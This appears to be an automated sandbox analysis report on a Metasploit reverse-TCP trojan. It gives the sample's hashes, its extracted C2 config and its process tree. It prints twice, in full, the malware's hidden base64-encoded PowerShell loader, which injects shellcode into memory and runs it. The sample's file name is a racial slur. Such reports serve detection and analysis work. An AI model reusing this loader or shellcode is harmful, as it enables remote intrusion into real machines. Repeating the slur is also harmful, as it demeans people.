metasploit | b19b8f316e186672a30f77299bc26039916efffe7df5fd27d9e1eb5da4c786de

General

Target

nigger.exe
Size

17KB
MD5

0e90a35ee68f8145cc2e462ead20a986
SHA1

523b0b69ba6b648b73e2be445a4727495b853616
SHA256

b19b8f316e186672a30f77299bc26039916efffe7df5fd27d9e1eb5da4c786de
SHA512

dda1530b20e365ca5ddcbf982aa674b01e3a002f368bb53c96b05eea9896c1e776edcf5bd33a387c26b6bdcf63cae83fe881e12b8a181bd824809c701cd0fa5c
SSDEEP

384:0EEoLO56ayzcMj+cECNvnKw3WwRcYOINeKRnfTPL+r:3E8O56lcVgwwRcXINe0fTPL+r

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.88.128:3333

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2192 powershell.exe
1676 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2192 powershell.exe
Token: SeDebugPrivilege 1676 powershell.exe

pid	process
2192	powershell.exe
1676	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

nigger.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2220 wrote to memory of 1884	2220	nigger.exe	cmd.exe
PID 2220 wrote to memory of 1884	2220	nigger.exe	cmd.exe
PID 2220 wrote to memory of 1884	2220	nigger.exe	cmd.exe
PID 1884 wrote to memory of 2192	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 2192	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 2192	1884	cmd.exe	powershell.exe
PID 2192 wrote to memory of 1676	2192	powershell.exe	powershell.exe
PID 2192 wrote to memory of 1676	2192	powershell.exe	powershell.exe
PID 2192 wrote to memory of 1676	2192	powershell.exe	powershell.exe
PID 2192 wrote to memory of 1676	2192	powershell.exe	powershell.exe
PID 1676 wrote to memory of 2756	1676	powershell.exe	csc.exe
PID 1676 wrote to memory of 2756	1676	powershell.exe	csc.exe
PID 1676 wrote to memory of 2756	1676	powershell.exe	csc.exe
PID 1676 wrote to memory of 2756	1676	powershell.exe	csc.exe
PID 2756 wrote to memory of 3004	2756	csc.exe	cvtres.exe
PID 2756 wrote to memory of 3004	2756	csc.exe	cvtres.exe
PID 2756 wrote to memory of 3004	2756	csc.exe	cvtres.exe
PID 2756 wrote to memory of 3004	2756	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\nigger.exe
"C:\Users\Admin\AppData\Local\Temp\nigger.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABSAHYAcAAgAD0AIAAnACQAegBXAEkAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB6AFcASQBTACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjAGMALAAwAHgAYgBkACwAMAB4AGMANQAsADAAeAAxADcALAAwAHgAOAA0ACwAMAB4ADQAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANgBlACwAMAB4ADEANwAsADAAeAAwADMALAAwAHgANgBlACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAMAAzACwAMAB4ADEAMwAsADAAeAA2ADYALAAwAHgAYgA3ACwAMAB4ADcANwAsADAAeABmADQALAAwAHgAZQA5ACwAMAB4ADMAOAAsADAAeAA4ADcALAAwAHgAMAA1ACwAMAB4ADkANgAsADAAeAAwADkALAAwAHgANQA1ACwAMAB4ADgAYwAsADAAeABiADMALAAwAHgAMABlACwAMAB4AGQAMgAsADAAeABkAGQALAAwAHgAMABiACwAMAB4ADQANAAsADAAeABiADYALAAwAHgAZQBkACwAMAB4AGUAMAAsADAAeAAwADgALAAwAHgAMgAyACwAMAB4AGQAZgAsADAAeAAwADkALAAwAHgAMgA3ACwAMAB4ADMAOAAsADAAeAAzADcALAAwAHgAZgA5ACwAMAB4ADgAZgAsADAAeABmADYALAAwAHgANgAxACwAMAB4ADMANAAsADAAeAAzADAALAAwAHgAYQBhACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAYwBjACwAMAB4AGIAMAAsADAAeAA4ADYALAAwAHgAYgA3ACwAMAB4AGUAZAAsADAAeAA3AGIALAAwAHgAZABiACwAMAB4AGIANgAsADAAeAAyAGEALAAwAHgAYwBhACwAMAB4ADkAMQAsADAAeAA1ADcALAAwAHgAZQA2ACwAMAB4ADQANwAsADAAeAAwAGIALAAwAHgAYgA4ACwAMAB4ADUAMAAsADAAeABkAGMALAAwAHgAZQBlACwAMAB4ADgANAAsADAAeAA1AGYALAAwAHgAMwAyACwAMAB4ADYANQAsADAAeABiADQALAAwAHgAMgA3ACwAMAB4ADMANwAsADAAeABiAGEALAAwAHgANAAxACwAMAB4ADkANAAsADAAeAAzADYALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABhAGYALAAwAHgANgAwACwAMAB4ADIAYgAsADAAeAA3ADAALAAwAHgAZQA3ACwAMAB4ADgAOAAsADAAeAAyAGEALAAwAHgANQA1ACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgANQA4ACwAMAB4ADYANQAsADAAeAA0AGYALAAwAHgAOABlACwAMAB4AGUAOAAsADAAeAAxAGUALAAwAHgAOQBiACwAMAB4AGYAYgAsADAAeABlAGEALAAwAHgAZgA2ACwAMAB4AGQANQAsADAAeAAzAGIALAAwAHgAMgBkACwAMAB4ADMAOQAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGEAZgAsADAAeAAwADEALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeABjADUALAAwAHgANwA5ACwAMAB4ADUAZgAsADAAeAAzAGEALAAwAHgAZABlACwAMAB4AGIAOQAsADAAeAAxAGQALAAwAHgAZQAwACwAMAB4ADYAYgAsADAAeAA1AGUALAAwAHgAOAA1ACwAMAB4ADYAMwAsADAAeABjAGIALAAwAHgAYgBhACwAMAB4ADMANwAsADAAeABhADAALAAwAHgAOABhACwAMAB4ADQAOQAsADAAeAAzAGIALAAwAHgAMABkACwAMAB4AGQAOAAsADAAeAAxADYALAAwAHgANQA4ACwAMAB4ADkAMAAsADAAeAAwAGQALAAwAHgAMgBkACwAMAB4ADYANAAsADAAeAAxADkALAAwAHgAYgAwACwAMAB4AGUAMgAsADAAeABlAGMALAAwAHgANQA5ACwAMAB4ADkANwAsADAAeAAyADYALAAwAHgAYgA0ACwAMAB4ADMAYQAsADAAeABiADYALAAwAHgANwBmACwAMAB4ADEAMAAsADAAeABlAGQALAAwAHgAYwA3ACwAMAB4ADYAMAAsADAAeABmAGMALAAwAHgANQAyACwAMAB4ADYAMgAsADAAeABlAGEALAAwAHgAZQBmACwAMAB4ADgANQAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4AGYAMAAsADAAeABhAGEALAAwAHgANABlACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgANgA2ACwAMAB4ADcAMQAsADAAeAA1ADQALAAwAHgAMgBiACwAMAB4AGYAMQAsADAAeAAwADIALAAwAHgANgA2ACwAMAB4AGYANAAsADAAeABhADkALAAwAHgAOABjACwAMAB4AGMAYQAsADAAeAA3AGQALAAwAHgANwA3ACwAMAB4ADQAYQAsADAAeAA1AGEALAAwAHgANgA5ACwAMAB4ADgAOAAsADAAeAA4ADQALAAwAHgAZQA0ACwAMAB4AGYAYQAsADAAeAA3ADcALAAwAHgAMgA1ACwAMAB4ADEANQAsADAAeABkADIALAAwAHgAYgAzACwAMAB4ADcAMQAsADAAeAA0ADUALAAwAHgANABjACwAMAB4ADEAMgAsADAAeABmAGEALAAwAHgAMABlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAMgBmACwAMAB4AGIAYQAsADAAeAA4ADYALAAwAHgAMABiACwAMAB4ADEAMAAsADAAeAA5ADMALAAwAHgAYwBmACwAMAB4ADQAYgAsADAAeABmADgALAAwAHgAZQA2ACwAMAB4AGUAZgAsADAAeAA0ADYALAAwAHgAZgBjACwAMAB4ADYAZgAsADAAeAAwADkALAAwAHgAMAA4ACwAMAB4AGEAZQAsADAAeAAzAGYALAAwAHgAOAA2ACwAMAB4AGUAOAAsADAAeAAxAGUALAAwAHgAOAAwACwAMAB4ADcANgAsADAAeAA4ADAALAAwAHgANwA0ACwAMAB4ADAAZgAsADAAeABhADgALAAwAHgAYgAwACwAMAB4ADcANgAsADAAeABjADUALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeAA5ADkALAAwAHgAYgAwACwAMAB4AGIAYQAsADAAeABmADIALAAwAHgAMAAwACwAMAB4ADkAOQAsADAAeAAzADEALAAwAHgANgAzACwAMAB4AGMAYwAsADAAeAAzADcALAAwAHgAMwBjACwAMAB4AGEAMwAsADAAeAA0ADYALAAwAHgAYgA0ACwAMAB4AGMAMAAsADAAeAA2AGQALAAwAHgAYQBmACwAMAB4AGIAMQAsADAAeABkADIALAAwAHgAMQA5ACwAMAB4ADUAZgAsADAAeAA4AGMALAAwAHgAOAA5ACwAMAB4ADgAZgAsADAAeAA2ADAALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAyAGYALAAwAHgAZgA1ACwAMAB4AGMAMQAsADAAeAA2AGUALAAwAHgANwA4ACwAMAB4ADYAMQAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADQAZQAsADAAeAAyAGUALAAwAHgAMwAzACwAMAB4AGIAMgAsADAAeABjADUALAAwAHgAZQA3ACwAMAB4AGEAMQAsADAAeAA3AGQALAAwAHgAYgAxACwAMAB4ADAANwAsADAAeAAyADYALAAwAHgANwBlACwAMAB4ADQAMQAsADAAeAA1AGUALAAwAHgAMgBjACwAMAB4ADcAZQAsADAAeAAyADkALAAwAHgAMAA2ACwAMAB4ADEANAAsADAAeAAyAGQALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAA4ADEALAAwAHgANAAxACwAMAB4AGQAZAAsADAAeABkAGMALAAwAHgAMgBhACwAMAB4ADMAMAAsADAAeABiADIALAAwAHgANwA3ACwAMAB4ADQAMwAsADAAeABiAGUALAAwAHgAZQBkACwAMAB4AGIAMAAsADAAeABjAGMALAAwAHgANAAxACwAMAB4AGQAOAAsADAAeAA0ADAALAAwAHgAMwAwACwAMAB4ADkANAAsADAAeAAyADQALAAwAHgAMwA3ACwAMAB4ADUAOAAsADAAeAAyADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADgAMgA5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAA4ADIAOQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAOAAyADkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABSAHYAcAApACkAOwAkAE8ANgBjACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAVQBFAGUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVQBFAGUAIAAkAE8ANgBjACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8ANgBjACAAJABlACIAOwB9AA==
2⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JABSAHYAcAAgAD0AIAAnACQAegBXAEkAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAB6AFcASQBTACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjAGMALAAwAHgAYgBkACwAMAB4AGMANQAsADAAeAAxADcALAAwAHgAOAA0ACwAMAB4ADQAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANgBlACwAMAB4ADEANwAsADAAeAAwADMALAAwAHgANgBlACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAMAAzACwAMAB4ADEAMwAsADAAeAA2ADYALAAwAHgAYgA3ACwAMAB4ADcANwAsADAAeABmADQALAAwAHgAZQA5ACwAMAB4ADMAOAAsADAAeAA4ADcALAAwAHgAMAA1ACwAMAB4ADkANgAsADAAeAAwADkALAAwAHgANQA1ACwAMAB4ADgAYwAsADAAeABiADMALAAwAHgAMABlACwAMAB4AGQAMgAsADAAeABkAGQALAAwAHgAMABiACwAMAB4ADQANAAsADAAeABiADYALAAwAHgAZQBkACwAMAB4AGUAMAAsADAAeAAwADgALAAwAHgAMgAyACwAMAB4AGQAZgAsADAAeAAwADkALAAwAHgAMgA3ACwAMAB4ADMAOAAsADAAeAAzADcALAAwAHgAZgA5ACwAMAB4ADgAZgAsADAAeABmADYALAAwAHgANgAxACwAMAB4ADMANAAsADAAeAAzADAALAAwAHgAYQBhACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAYwBjACwAMAB4AGIAMAAsADAAeAA4ADYALAAwAHgAYgA3ACwAMAB4AGUAZAAsADAAeAA3AGIALAAwAHgAZABiACwAMAB4AGIANgAsADAAeAAyAGEALAAwAHgAYwBhACwAMAB4ADkAMQAsADAAeAA1ADcALAAwAHgAZQA2ACwAMAB4ADQANwAsADAAeAAwAGIALAAwAHgAYgA4ACwAMAB4ADUAMAAsADAAeABkAGMALAAwAHgAZQBlACwAMAB4ADgANAAsADAAeAA1AGYALAAwAHgAMwAyACwAMAB4ADYANQAsADAAeABiADQALAAwAHgAMgA3ACwAMAB4ADMANwAsADAAeABiAGEALAAwAHgANAAxACwAMAB4ADkANAAsADAAeAAzADYALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABhAGYALAAwAHgANgAwACwAMAB4ADIAYgAsADAAeAA3ADAALAAwAHgAZQA3ACwAMAB4ADgAOAAsADAAeAAyAGEALAAwAHgANQA1ACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgANQA4ACwAMAB4ADYANQAsADAAeAA0AGYALAAwAHgAOABlACwAMAB4AGUAOAAsADAAeAAxAGUALAAwAHgAOQBiACwAMAB4AGYAYgAsADAAeABlAGEALAAwAHgAZgA2ACwAMAB4AGQANQAsADAAeAAzAGIALAAwAHgAMgBkACwAMAB4ADMAOQAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGEAZgAsADAAeAAwADEALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeABjADUALAAwAHgANwA5ACwAMAB4ADUAZgAsADAAeAAzAGEALAAwAHgAZABlACwAMAB4AGIAOQAsADAAeAAxAGQALAAwAHgAZQAwACwAMAB4ADYAYgAsADAAeAA1AGUALAAwAHgAOAA1ACwAMAB4ADYAMwAsADAAeABjAGIALAAwAHgAYgBhACwAMAB4ADMANwAsADAAeABhADAALAAwAHgAOABhACwAMAB4ADQAOQAsADAAeAAzAGIALAAwAHgAMABkACwAMAB4AGQAOAAsADAAeAAxADYALAAwAHgANQA4ACwAMAB4ADkAMAAsADAAeAAwAGQALAAwAHgAMgBkACwAMAB4ADYANAAsADAAeAAxADkALAAwAHgAYgAwACwAMAB4AGUAMgAsADAAeABlAGMALAAwAHgANQA5ACwAMAB4ADkANwAsADAAeAAyADYALAAwAHgAYgA0ACwAMAB4ADMAYQAsADAAeABiADYALAAwAHgANwBmACwAMAB4ADEAMAAsADAAeABlAGQALAAwAHgAYwA3ACwAMAB4ADYAMAAsADAAeABmAGMALAAwAHgANQAyACwAMAB4ADYAMgAsADAAeABlAGEALAAwAHgAZQBmACwAMAB4ADgANQAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4AGYAMAAsADAAeABhAGEALAAwAHgANABlACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgANgA2ACwAMAB4ADcAMQAsADAAeAA1ADQALAAwAHgAMgBiACwAMAB4AGYAMQAsADAAeAAwADIALAAwAHgANgA2ACwAMAB4AGYANAAsADAAeABhADkALAAwAHgAOABjACwAMAB4AGMAYQAsADAAeAA3AGQALAAwAHgANwA3ACwAMAB4ADQAYQAsADAAeAA1AGEALAAwAHgANgA5ACwAMAB4ADgAOAAsADAAeAA4ADQALAAwAHgAZQA0ACwAMAB4AGYAYQAsADAAeAA3ADcALAAwAHgAMgA1ACwAMAB4ADEANQAsADAAeABkADIALAAwAHgAYgAzACwAMAB4ADcAMQAsADAAeAA0ADUALAAwAHgANABjACwAMAB4ADEAMgAsADAAeABmAGEALAAwAHgAMABlACwAMAB4ADgAYwAsADAAeAA5AGIALAAwAHgAMgBmACwAMAB4AGIAYQAsADAAeAA4ADYALAAwAHgAMABiACwAMAB4ADEAMAAsADAAeAA5ADMALAAwAHgAYwBmACwAMAB4ADQAYgAsADAAeABmADgALAAwAHgAZQA2ACwAMAB4AGUAZgAsADAAeAA0ADYALAAwAHgAZgBjACwAMAB4ADYAZgAsADAAeAAwADkALAAwAHgAMAA4ACwAMAB4AGEAZQAsADAAeAAzAGYALAAwAHgAOAA2ACwAMAB4AGUAOAAsADAAeAAxAGUALAAwAHgAOAAwACwAMAB4ADcANgAsADAAeAA4ADAALAAwAHgANwA0ACwAMAB4ADAAZgAsADAAeABhADgALAAwAHgAYgAwACwAMAB4ADcANgAsADAAeABjADUALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeAA5ADkALAAwAHgAYgAwACwAMAB4AGIAYQAsADAAeABmADIALAAwAHgAMAAwACwAMAB4ADkAOQAsADAAeAAzADEALAAwAHgANgAzACwAMAB4AGMAYwAsADAAeAAzADcALAAwAHgAMwBjACwAMAB4AGEAMwAsADAAeAA0ADYALAAwAHgAYgA0ACwAMAB4AGMAMAAsADAAeAA2AGQALAAwAHgAYQBmACwAMAB4AGIAMQAsADAAeABkADIALAAwAHgAMQA5ACwAMAB4ADUAZgAsADAAeAA4AGMALAAwAHgAOAA5ACwAMAB4ADgAZgAsADAAeAA2ADAALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAyAGYALAAwAHgAZgA1ACwAMAB4AGMAMQAsADAAeAA2AGUALAAwAHgANwA4ACwAMAB4ADYAMQAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADQAZQAsADAAeAAyAGUALAAwAHgAMwAzACwAMAB4AGIAMgAsADAAeABjADUALAAwAHgAZQA3ACwAMAB4AGEAMQAsADAAeAA3AGQALAAwAHgAYgAxACwAMAB4ADAANwAsADAAeAAyADYALAAwAHgANwBlACwAMAB4ADQAMQAsADAAeAA1AGUALAAwAHgAMgBjACwAMAB4ADcAZQAsADAAeAAyADkALAAwAHgAMAA2ACwAMAB4ADEANAAsADAAeAAyAGQALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAA4ADEALAAwAHgANAAxACwAMAB4AGQAZAAsADAAeABkAGMALAAwAHgAMgBhACwAMAB4ADMAMAAsADAAeABiADIALAAwAHgANwA3ACwAMAB4ADQAMwAsADAAeABiAGUALAAwAHgAZQBkACwAMAB4AGIAMAAsADAAeABjAGMALAAwAHgANAAxACwAMAB4AGQAOAAsADAAeAA0ADAALAAwAHgAMwAwACwAMAB4ADkANAAsADAAeAAyADQALAAwAHgAMwA3ACwAMAB4ADUAOAAsADAAeAAyADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADgAMgA5AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAA4ADIAOQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAOAAyADkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABSAHYAcAApACkAOwAkAE8ANgBjACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAVQBFAGUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAVQBFAGUAIAAkAE8ANgBjACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8ANgBjACAAJABlACIAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2192

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
